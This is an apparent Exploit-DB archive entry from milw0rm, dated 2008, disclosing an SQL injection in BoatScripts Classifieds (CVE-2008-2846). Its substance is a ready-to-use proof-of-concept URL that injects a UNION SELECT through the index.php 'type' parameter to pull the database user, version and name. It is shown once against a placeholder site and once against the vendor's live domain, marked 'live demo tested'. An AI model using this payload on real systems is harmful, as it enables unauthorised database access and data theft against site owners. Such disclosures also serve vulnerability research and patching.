BoatScripts Classifieds index.php type SQL Injection Vulnerability

2008-06-18T00:00:00
ID EDB-ID:5858
Type exploitdb
Reporter Stack
Modified 2008-06-18T00:00:00

Description

BoatScripts Classifieds (index.php type) SQL Injection Vulnerability. CVE-2008-2846. Webapps exploit for php platform

                                        
                                            BoatScripts Classifieds Sql INjection

By Stack
Home v4-team.com

poc : http://site.co.il/index.php?type=-1/**/UNION/**/SELECT/**/concat(char(58),user(),version(),database())/*
live demo tested
http://www.boatscripts.com/boats/index.php?type=-1/**/UNION/**/SELECT/**/concat(char(58),user(),version(),database())/*

# milw0rm.com [2008-06-18]